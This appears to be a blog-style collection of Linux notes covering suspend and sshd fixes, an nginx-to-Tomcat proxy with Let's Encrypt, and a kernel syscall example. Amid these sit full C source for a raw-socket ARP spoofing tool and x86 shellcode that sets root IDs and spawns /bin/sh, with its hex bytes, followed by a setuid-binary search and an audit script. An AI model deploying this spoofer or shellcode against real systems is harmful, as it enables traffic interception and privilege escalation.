The machine would not wake from suspend; after a forced reboot, /var/log/syslog contained the log below.

 

Apr 30 13:34:49 pc-linux systemd[1]: anacron.service: Succeeded.
Apr 30 13:34:49 pc-linux systemd[1]: motd-news.service: Succeeded.
Apr 30 13:34:49 pc-linux systemd[1]: Finished Message of the Day.
Apr 30 13:35:30 pc-linux acpid: input device has been disconnected, fd 24


Apr 30 14:08:38 pc-linux kernel: [    0.000000] Linux version 5.8.0-50-generic (buildd@lgw01-amd64-030) (gcc (Ubuntu 9.3.0-17ubuntu1~20.04) 9.3.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #56~20.04.1-Ubuntu SMP Mon Apr 12 21:46:35 UTC 2021 (Ubuntu 5.8.0-50.56~20.04.1-generic 5.8.18)
Apr 30 14:08:38 pc-linux systemd-modules-load[408]: Inserted module 'parport_pc'
Apr 30 14:08:38 pc-linux kernel: [    0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-5.8.0-50-generic root=UUID=9cff6431-fc36-40b9-b47b-a57914ef6d71 ro quiet splash crashkernel=512M-:192M
Apr 30 14:08:38 pc-linux kernel: [    0.000000] KERNEL supported cpus:
Apr 30 14:08:38 pc-linux kernel: [    0.000000]   Intel GenuineIntel
Apr 30 14:08:38 pc-linux kernel: [    0.000000]   AMD AuthenticAMD

Searching for that message turned up a bug in which the USB mouse and keyboard are closed while the machine is suspended.

The fix, reportedly, is to keep USB devices from entering power-saving (autosuspend) mode.

The fixes are:

Fix 1:

In /etc/default/grub, append "usbcore.autosuspend=-1" to the end of GRUB_CMDLINE_LINUX_DEFAULT.

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash usbcore.autosuspend=-1"

Then run update-grub and reboot.

Fix 2:

$ echo "options usbcore autosuspend=-1" | sudo tee /etc/modprobe.d/disable-usb-autosuspend.conf

Run the command, then reboot.

Edit the /etc/ssh/sshd_config file, then restart.

# /etc/ssh/sshd_config

# add this
UseDNS no


# If the above does not help, add these as well
GSSAPIAuthentication no
GSSAPICleanupCredentials yes


If the above does not work:

Restart the systemd-logind.service service.

# systemctl restart systemd-logind.service


Sometimes, however, it fails to restart.

In that case, restart the systemd daemon itself.

# systemctl daemon-reexec



Reference URL: https://unix.stackexchange.com/questions/393394/systemd-logind-service-fails-to-start-when-attempting-to-return-from-rescue-tar

nginx configuration


vi /etc/nginx/sites-available/default  (add the following at the very top)

upstream        tomcat {
         server  127.0.0.1:8080  fail_timeout=0;
 }


nginx: first domain (www.hoticle.net)

# Example 1. http://www.hoticle.net

vi /etc/nginx/sites-available/www.hoticle.net

# hoticle.net => www.hoticle.net
server {
        listen 80;
        server_name hoticle.net;
        return 301 $scheme://www.hoticle.net$request_uri;
}

# www.hoticle.net configuration
server {
        listen 80;
        listen [::]:80;

        server_name www.hoticle.net;

        # Directory used by Let's Encrypt
        location /.well-known {
                # Note that a request for /.well-known/test.html will
                # look for /var/www/ssl-proof/tomcat/.well-known/test.html
                # and not /var/www/ssl-proof/tomcat/test.html
                root /var/www/ssl-proof/tomcat/;
        }

        location / {
                proxy_redirect off;
                proxy_pass_header Server;

                proxy_set_header Host $http_host;
                proxy_set_header X-Forwarded-Proto $scheme;
                proxy_set_header X-Forwarded-Port $server_port;
                proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                proxy_set_header X-Real-IP $remote_addr;
                proxy_set_header X-Scheme $scheme;
                proxy_pass http://tomcat;
                charset utf-8;
        }
}
 



Second domain (www.bbb.net)

# Example 1. http://www.bbb.net

vi /etc/nginx/sites-available/www.bbb.net

# www.bbb.net configuration
server {
        listen 80;
        listen [::]:80;

        server_name www.bbb.net;

        # Directory used by Let's Encrypt
        location /.well-known {
                # Note that a request for /.well-known/test.html will
                # look for /var/www/ssl-proof/tomcat/.well-known/test.html
                # and not /var/www/ssl-proof/tomcat/test.html
                root /var/www/ssl-proof/tomcat/;
        }

        location / {
                proxy_redirect off;
                proxy_pass_header Server;

                proxy_set_header Host $http_host;
                proxy_set_header X-Forwarded-Proto $scheme;
                proxy_set_header X-Forwarded-Port $server_port;
                proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
                proxy_set_header X-Real-IP $remote_addr;
                proxy_set_header X-Scheme $scheme;
                proxy_pass http://tomcat;
                charset utf-8;
        }
}




# Test the nginx configuration syntax

nginx -t

# Restart nginx

systemctl restart nginx.service



Tomcat configuration


server.xml settings

vi /etc/tomcat/server.xml

 <Connector port="8080" protocol="HTTP/1.1"
               connectionTimeout="20000"
               URIEncoding="UTF-8"
               address="127.0.0.1"
               redirectPort="8443" />

...


       <Host name="www.hoticle.net" appBase="/var/www/Hoticle" autoDeploy="true"  xmlValidation="false" xmlNamespaceAware="false">
              <Context path="/" docBase="" reloadable="true" />
      </Host>
      <Host name="www.bbb.net" appBase="/var/www/bbb" autoDeploy="true"  xmlValidation="false" xmlNamespaceAware="false">
              <Context path="/" docBase="" reloadable="true" />
      </Host>


  </Engine>

  </Service>
</Server> 



# Restart tomcat

systemctl restart tomcat8.service



Let's Encrypt

Run Let's Encrypt

# certbot --nginx -d www.hoticle.net -d www.bbb.net



Register in crontab

# Let's Encrypt
30 2 * * * certbot renew --noninteractive --renew-hook "/bin/systemctl reload nginx" >> /var/log/le-renew.log



Reference sites:

https://tom.busby.ninja/letsecnrypt-nginx-reverse-proxy-no-downtime/
https://www.digitalocean.com/community/tutorials/how-to-secure-nginx-with-let-s-encrypt-on-debian-8

# cat /etc/nginx/sites-available/default
# Default server configuration
#
server {
        listen 80 default_server;
        listen [::]:80 default_server;

        root /var/www/html;

        # Add index.php to the list if you are using PHP
        index index.php index.html index.htm index.nginx-debian.html;

        server_name _;

        location / {
                try_files $uri $uri/ =404;
        }

        location ~ ^/~(?<user>.+?)(?<path>/.*)?$ {
                alias /home/$user/public_html$path;
                autoindex on;

                location ~ \.php$ {
                        if (!-f $request_filename) { return 404; }

                        fastcgi_pass unix:/run/php/php7.0-fpm.sock;
                        fastcgi_intercept_errors on;
                        include fastcgi_params;
                        fastcgi_param  SCRIPT_FILENAME $request_filename;
                }
        }

        location ~ \.php$ {
                include snippets/fastcgi-php.conf;

                # With php7.0-cgi alone:
                # fastcgi_pass 127.0.0.1:9000;
                # With php7.0-fpm:
                fastcgi_pass unix:/run/php/php7.0-fpm.sock;
        }



        # deny access to .htaccess files, if Apache's document root
        # concurs with nginx's one
        #
        location ~ /\.ht {
                deny all;
        }
}


Kernel programming: printing Hello world! (32-bit)

Short version


1. cd /usr/src/linux-2.6.32.60


2. Add to arch/x86/kernel/syscall_table_32.S --> .long sys_hello_world        /* 337 */


3. Add to arch/x86/include/asm/unistd_32.h --> #define __NR_hello_world     337 (337 is the last number (336) + 1)


4. Create kernel/hello_world.c -->


/* kernel/hello_world.c */

#include <linux/linkage.h>
#include <linux/unistd.h>
#include <linux/kernel.h>

asmlinkage long sys_hello_world(void)
{
    printk("Hello World!\n");
    return (0);
}
 


5. Edit kernel/Makefile


obj-y += groups.o hello_world.o  # add hello_world.o


6. Compile the kernel

 # make mrproper && make clean && make menuconfig && make && make modules && make modules_install


7. Create the initial ramdisk for the kernel

# cd /boot && mkinitramfs -o initrd.img-2.6.32.60 2.6.32.60


8. # update-grub && reboot


9. Set up the kernel include links.

# cd /usr/include

# mv asm asm_bak

# mv linux linux_bak

# ln -sf /usr/src/linux-2.6.32.60/arch/x86/include/asm asm

#  ln -sf /usr/src/linux-2.6.32.60/arch/x86/include/linux linux


10. Write and compile the test code

$ cd ~

$ mkdir tmp

$ vi mysys.c


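#include <linux/unistd.h>   /* __NR_hello_world (through the links from step 9) */
#include <unistd.h>         /* syscall() */
#include <stdio.h>
int main() {
     /* syscall() returns long: 0 on success, -1 if the call is not in the kernel */
     printf("%ld\n", syscall(__NR_hello_world));
     return 0;
}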

$ make mysys

$ ./mysys


11. Check the kernel log

$ dmesg

 ...

 [ 4501.406221] Hello World!

1. Install tomcat6, eclipse, java6

 yaourt jdk6

 pacman -S tomcat6

 yaourt eclipse-indigo


2. Install WTP

 eclipse --> help --> Install New SoftWare... --> Add... --> add http://download.eclipse.org/releases/indigo, then update

 eclipse --> help --> Install New SoftWare... --> Add... --> install Web Tools Platform SDK 3.3.2.


3. Add the account that will use eclipse to the tomcat group.

 # gpasswd -a $USER tomcat


4. Configure the tomcat6 server in eclipse

 eclipse --> window --> Preferences --> Server --> Runtime Environments --> Add

 Select tomcat6 --> Tomcat Directory :  /usr/share/tomcat6 --> Finish



arpspoof requires libnet and libpcap, so I tried writing a version that works with raw sockets alone.

 Usage:
 
  au [-r] -i <ethernet interface> -t <target ip> <source ip>

  exam) au -i eth0 192.168.0.10 192.168.0.5 : ARP REQUEST
        au -r -i eth0 192.168.0.10 192.168.0.1 : ARP REPLY


// au.c
// gcc -o au au.c
// author : http://fehead.tistory.com
#include <stdio.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/if_arp.h>
#include <linux/if_ether.h>
#include <linux/if_packet.h>// struct sockaddr_ll
#include <sys/ioctl.h>		// struct ifreq
#include <strings.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <stdlib.h>
#include <signal.h>

typedef unsigned char	uchar;
typedef unsigned short	ushort;

// ethernet frame header.
struct eth_hdr
{
	uchar	h_dest[6];				// destination ether addr
	uchar	h_source[6];			// source ether addr
	ushort	h_proto;				// packet type ID field
} __attribute__((packed));

static const int ETHERNET_SIZE = sizeof(struct eth_hdr);

// ARP header
struct arp_hdr
{
	ushort	ar_hrd;		// Hardware type : ethernet
	ushort	ar_pro;     // Protocol		 : IP
	uchar	ar_hln;     // Hardware size
	uchar	ar_pln;     // Protocol size
	ushort	ar_op;      // Opcode (1: request, 2: reply)
	uchar	ar_sha[6];  // Sender MAC
	uchar	ar_sip[4];  // Sender IP
	uchar	ar_tha[6];  // Target mac
	uchar	ar_tip[4];  // Target IP
} __attribute__((packed));

static const int ARP_SIZE = sizeof(struct arp_hdr);


static uchar g_buf[sizeof(struct eth_hdr)+sizeof(struct arp_hdr)];
static const char * g_source_ip = NULL;
static const char * g_interface = NULL;
static int g_sock = -1;

// dumps raw memory in hex byte and printable split format
void dump(const uchar *data_buffer, const unsigned int length) {
	uchar byte;
	unsigned int i, j;
	for(i=0; i < length; i++) {
		byte = data_buffer[i];
		printf("%02x ", data_buffer[i]);  // display byte in hex
		if(((i%16)==15) || (i==length-1)) {
			for(j=0; j < 15-(i%16); j++)
				printf("   ");
			printf("| ");
			for(j=(i-(i%16)); j <= i; j++) {  // display printable bytes from line
				byte = data_buffer[j];
				if((byte > 31) && (byte < 127)) // outside printable char range
					printf("%c", byte);
				else
					printf(".");
			}
			printf("\n"); // end of the dump line (each line 16 bytes)
		} // end if
	} // end for
}


// get interface mac addr.
//  exam) interface2mac("eth0", buf);
// return : 1 success
//        : 0 failure
int interface2mac(const char * interface, uchar * mac)
{
	int fd = socket(PF_INET, SOCK_STREAM, 0);
	if(fd == -1)
	{
		perror("socket");
		return 0;
	}

	struct ifreq iflist;
	bzero(&iflist, sizeof(iflist));
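	// iflist is zeroed, so copying size-1 bytes keeps the name NUL-terminated
	strncpy(iflist.ifr_name, interface, sizeof(iflist.ifr_name) - 1);
	if(ioctl(fd, SIOCGIFHWADDR, &iflist) == -1)
	{
		perror("ioctl failed");
		close(fd);	// do not leak the descriptor on failure
		return 0;
	}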
	
	struct sockaddr * sa = &iflist.ifr_hwaddr;
	memcpy(mac, sa->sa_data, 6);

	close(fd);

#ifdef _DEBUG
	printf("interface2mac: %s\n", interface);
	dump(mac, 6);
#endif // _DEBUG
	return 1;
}

// get mac address to arp cash.
//  exam) get_arp_to_arpcash(ip)
// return : 1 success
//        : 0 failure
int get_arp_to_arpcash(unsigned long ip)
{
	int fd = 0;
	if((fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0)
		return 0;

	struct sockaddr_in sin;
	bzero(&sin, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = ip;
	sin.sin_port = htons(67);

	int i = sendto(fd, NULL, 0, 0, (struct sockaddr *)&sin, sizeof(sin));

	close(fd);

	return (i == 0);
}

// get MAC address from ip, interface
//  exam) arp_cash_lookup("eth0", ip, buf)
// return : 1 success
//        : 0 failure
int arp_cash_lookup(const char * interface, unsigned long ip, uchar * mac)
{
	int sock = 0;
	struct arpreq	ar;
	struct sockaddr_in * sin = 0;

	bzero(&ar, sizeof(ar));

	strncpy(ar.arp_dev, interface, sizeof(ar.arp_dev) - 1);	// ar is zeroed: stays NUL-terminated
	sin = (struct sockaddr_in *)&ar.arp_pa;
	sin->sin_family = AF_INET;
	sin->sin_addr.s_addr = ip;

	if((sock = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
		return 0;

	if(ioctl(sock, SIOCGARP, (caddr_t)&ar) == -1)
	{
		close(sock);
		return 0;
	}
	close(sock);
	memcpy(mac, ar.arp_ha.sa_data, 6);

	return 1;
}

// string to mac address
//  exam) "01:02:03:0d:0e:0f" --> "\x01\x02\x03\x0d\x0e\x0f"
// return : 1 success
//        : 0 failure
int str2mac(const char * str_mac, uchar * mac)
{
	int ret = sscanf(str_mac, "%hhx:%hhx:%hhx:%hhx:%hhx:%hhx",
			&mac[0], &mac[1], &mac[2],
			&mac[3], &mac[4], &mac[5]);

#ifdef _DEBUG
	int i = 0;
	printf("MAC : ");
	for(i = 0 ; i < 6 ; ++i)
		printf("%hhx:", mac[i]);

	printf("\n");
#endif // _DEBUG

	return ret == 6;	// success only when all six octets were parsed
}

// string to ip.
//  exam) "192.168.0.1" --> "\xc0\xa8\x00\x01"
// return : 1 success
//        : 0 failure
int str2ip(const char * str_ip, uchar * ip)
{
	int ret = sscanf(str_ip, "%hhu.%hhu.%hhu.%hhu",
			&ip[0], &ip[1], &ip[2], &ip[3]);

#ifdef _DEBUG
	int i = 0;
	printf("IP : ");
	for(i = 0 ; i < 4 ; ++i)
		printf("%hhu.", ip[i]);
	printf("\n");
#endif // _DEBUG
	return ret == 4;	// success only when all four octets were parsed
}

// convert ip to mac address
//  exam) ip2mac("eth0", "192.168.0.10", buf);
// return : 1 success
//        : 0 failure
int ip2mac(const char * intf, const char * str_ip, uchar * mac)
{
	int i = 0;
	unsigned int ip = 0;
	if(str2ip(str_ip, (uchar *)&ip) == 0)
		return 0;

	do
	{
		if(arp_cash_lookup(intf, ip, mac) == 1)
		{
#ifdef _DEBUG
			printf("ip2mac: %s\n", str_ip);
			dump(mac, 6);
#endif // _DEBUG
			return 1;
		}
		get_arp_to_arpcash(ip);

		sleep(1);
	}
	while(i++ < 3);

	return 0;
}

// init arp packet.
void init_packet(struct eth_hdr * e, struct arp_hdr * a, int reply)
{
	bzero(e, sizeof(*e));
	memset(e->h_dest, 0xff, sizeof(e->h_dest));
	e->h_proto = htons(0x0806);	// ARP protocol

	bzero(a, sizeof(*a));
	a->ar_hrd = htons(0x0001);	// Ethernet 10/100Mbps.
	a->ar_pro = htons(0x0800);	// IP protocol
	a->ar_hln = 6;				// hardware len
	a->ar_pln = 4;				// protocol len

	if(reply == 1)
		a->ar_op = htons(0x0002);	// 1 :request, 2 :reply
	else
		a->ar_op = htons(0x0001);	// 1 :request, 2 :reply

#ifdef _DEBUG
	printf("init_packet Ethernet Header:\n");
	dump((uchar *)e, sizeof(*e));

	printf("init_packet ARP Header:\n");
	dump((uchar *)a, sizeof(*a));
#endif // _DEBUG
}


// create rawsocket.
//  exam) rawsocket("eth0")
// return -1 : failure.
//        0 <= : success.
int rawsocket(const char * interface)
{
	int fd = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
	if(fd == -1)
	{
		perror("socket create:");
		return -1;
	}

	struct ifreq ifr;
	bzero(&ifr, sizeof(ifr));

	// select network interface ex) "eth0"
	// bounded copy: ifr is zeroed, so the name stays NUL-terminated
	strncpy(ifr.ifr_name, interface, sizeof(ifr.ifr_name) - 1);
	if(ioctl(fd, SIOCGIFINDEX, &ifr) == -1)
	{
		perror("error getting interface index\n");
		close(fd);
		return -1;
	}

	struct sockaddr_ll	sll;

	bzero(&sll, sizeof(sll));
	sll.sll_family = AF_PACKET;
	sll.sll_ifindex = ifr.ifr_ifindex;
	sll.sll_protocol = htons(ETH_P_ALL);

	if(bind(fd, (struct sockaddr*)&sll, sizeof(sll)) == -1)
	{
		perror("Error binding raw socket to interface\n");
		close(fd);
		return -1;
	}

	return fd;
}

void sig_cleanup(int signo)
{
	printf("clean up\n");

	struct eth_hdr * ether = (struct eth_hdr *)g_buf;
	struct arp_hdr * arp = (struct arp_hdr *)(g_buf+ETHERNET_SIZE);

	uchar source_mac[6] = { 0, };
	if(g_sock != -1 && ip2mac(g_interface, g_source_ip, source_mac) == 1)
	{
		// set source mac to original mac address
		memcpy(ether->h_source, source_mac, 6);
		memcpy(arp->ar_sha, source_mac, 6);
		
		int i = 0;
		for(i = 0 ; i < 3 ; ++i)
		{
			write(g_sock, g_buf, ETHERNET_SIZE+ARP_SIZE);
			sleep(1);
		}

		close(g_sock);
	}

	exit(0);
}

void usage()
{
	printf( "au [-r] -i <ethernet interface> -t <target ip> <source ip>\n"
			"  exam) au -i eth0 192.168.0.10 192.168.0.5 : ARP REQUEST\n"
			"        au -r -i eth0 192.168.0.10 192.168.0.1 : ARP REPLY\n");
	exit(1);
}

// au -i eth0 -t 192.168.0.10 192.168.0.1
int main(int argc, char * argv[])
{
	const char * target_ip = NULL;
	int			reply = 0;			// ARP reply

	g_interface = "eth0";
	int c = 0;
	while((c = getopt(argc, argv, "ri:t:")) != -1)
	{
		switch(c)
		{
		case 'i':
			g_interface = optarg;
			break;
		case 't':
			target_ip = optarg;
			break;
		case 'r':	// ARP REPLY
			reply = 1;
			break;
		default:
			usage();
		}
	}

	argc -= optind;
	argv += optind;

	if(argc != 1 || target_ip == NULL)	// -t <target ip> is required
		usage();

	g_source_ip = argv[0];
	
	bzero(g_buf, sizeof(g_buf));

	struct eth_hdr * ether = (struct eth_hdr *)g_buf;
	struct arp_hdr * arp = (struct arp_hdr *)(g_buf+ETHERNET_SIZE);

	init_packet(ether, arp, reply);

	if(interface2mac(g_interface, ether->h_source) == 0 ||
			ip2mac(g_interface, target_ip, ether->h_dest) == 0 ||
			str2ip(g_source_ip, arp->ar_sip) == 0 ||
			str2ip(target_ip, arp->ar_tip) == 0)
	{
		usage();
	}

	if(reply)
	{
		// ether->h_source == my mac		OK
		// ether->h_dest == target mac		OK
		// arp->ar_sha == my mac
		memcpy(arp->ar_sha, ether->h_source, sizeof(arp->ar_sha));

		// arp->ar_sip == source ip		OK
		// arp->ar_tha == target mac
		memcpy(arp->ar_tha, ether->h_dest, sizeof(arp->ar_tha));

		// arp->ar_tip == target ip			OK
	}
	else
	{
		// ether->h_source == my mac		OK
		// ether->h_dest == "\xff\xff\xff\xff\xff\xff"
		memset(ether->h_dest, 0xff, 6);

		// arp->ar_sha == my mac
		memcpy(arp->ar_sha, ether->h_source, sizeof(arp->ar_sha));

		// arp->ar_sip == my ip				OK source ip is my ip
		// arp->ar_tha == "\x00\x00\x00\x00\x00\x00"
		memset(arp->ar_tha, 0, 6);
		// arp->ar_tip == target ip			OK

		signal(SIGINT, &sig_cleanup);
	}

#ifdef _DEBUG
	printf("Ethernet Header:\n");
	dump((uchar *)ether, sizeof(*ether));

	printf("ARP Header:\n");
	dump((uchar *)arp, sizeof(*arp));
#endif // _DEBUG

	// create rawsocket
	g_sock = rawsocket(g_interface);
	if(g_sock == -1)
		return 1;

	for(;;)
	{
		putchar('.'); fflush(stdout);
		if(write(g_sock, g_buf, ETHERNET_SIZE+ARP_SIZE) < 1)
		{
			perror("write");
			break;
		}

		if(reply != 1)
			break;

		sleep(2);
	}

	close(g_sock);

	return 0;
}

$ cat priv_shell.s
BITS 32
global _start

_start:
;setresuid(uid_t ruid, uid_t euid, uid_t suid)
xor ebx, ebx  ; root ruid = 0
xor ecx, ecx  ; root euid = 0
xor edx, edx ; root suid = 0
xor eax, eax
mov al, 0xa4 ; setresuid call number = 0xa4(164)
int 0x80

;int execve(const char * filename, char * const argv[], char * const envp[])
; execve("/bin//sh", ["/bin//sh", 0x0], [ 0x0 ]);

xor eax, eax  ; eax = 0
push eax
push '//sh'
push '/bin'   ; "/bin//sh", 0x0

mov ebx, esp  ; const char * filename = "/bin//sh", 0x0
push eax
mov edx, esp  ; char * const envp[] = [ 0 ]
push ebx
mov ecx, esp  ; char * const argv[] = [ "/bin//sh", 0 ]
mov al, 11
int 0x80


$ xxd priv_shell
0000000: 31db 31c9 31d2 31c0 b0a4 cd80 31c0 5068  1.1.1.1.....1.Ph
0000010: 2f2f 7368 682f 6269 6e89 e350 89e2 5389  //shh/bin..P..S.
0000020: e1b0 0bcd 80                             .....

$ cat tiny_shell.s
BITS 32
global _start

_start:
;int execve(const char * filename, char * const argv[], char * const envp[])
; execve("/bin//sh", ["/bin//sh", 0x0], [ 0x0 ]);

xor eax, eax  ; eax = 0
push eax
push '//sh'
push '/bin'   ; "/bin//sh", 0x0

mov ebx, esp  ; const char * filename = "/bin//sh", 0x0
push eax
mov edx, esp  ; char * const envp[] = [ 0 ]
push ebx
mov ecx, esp  ; char * const argv[] = [ "/bin//sh", 0 ]
mov al, 11
int 0x80

$ ndisasm -B32 tiny_shell
00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  682F2F7368        push dword 0x68732f2f
00000008  682F62696E        push dword 0x6e69622f
0000000D  89E3              mov ebx,esp
0000000F  50                push eax
00000010  89E2              mov edx,esp
00000012  53                push ebx
00000013  89E1              mov ecx,esp
00000015  B00B              mov al,0xb
00000017  CD80              int 0x80

$ xxd tiny_shell
0000000: 31c0 5068 2f2f 7368 682f 6269 6e89 e350  1.Ph//shh/bin..P
0000010: 89e2 5389 e1b0 0bcd 80                   ..S......


find / -user root -perm -4000

This finds files that are owned by root and have the setuid bit set.

The errors it prints to the screen are annoying; to suppress them,

append 2> /dev/null to the end.


find / -user root -perm -4000 2> /dev/null
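
Added example (not from the original post): the bare list becomes useful once it is compared with a list that has already been reviewed. The functions below run the same find and print setuid-root paths that are missing from a baseline; the function names, the sample lists and the /tmp/.cache/helper path are constructed for illustration.

```shell
#!/bin/sh
# Constructed sample scans (one path per line).
SAMPLE_BASELINE='/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo'
SAMPLE_CURRENT='/tmp/.cache/helper
/usr/bin/passwd
/usr/bin/su
/usr/bin/sudo'

# suid_scan DIR: list setuid-root regular files under DIR, sorted, without
# crossing into other filesystems. Errors are discarded as in the post.
suid_scan() {
    find "$1" -xdev -type f -user root -perm -4000 2>/dev/null | LC_ALL=C sort
}

# suid_new BASELINE_FILE CURRENT_FILE: print paths that are in the current
# scan but not in the baseline, i.e. setuid-root files nobody has reviewed.
# FILENAME is compared with ARGV[1] so that an empty baseline still works.
suid_new() {
    awk 'FILENAME == ARGV[1] { known[$0] = 1; next }
         !($0 in known)' "$1" "$2"
}

# suid_audit_sample: run the comparison on the constructed lists above.
# On a live host:  suid_scan / > current.txt; suid_new baseline.txt current.txt
suid_audit_sample() {
    tmp=$(mktemp -d) || return 1
    printf '%s\n' "$SAMPLE_BASELINE" > "$tmp/baseline"
    printf '%s\n' "$SAMPLE_CURRENT"  > "$tmp/current"
    suid_new "$tmp/baseline" "$tmp/current"
    rm -rf "$tmp"
}
```

Paths containing newlines are not handled, since both lists are line-oriented.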
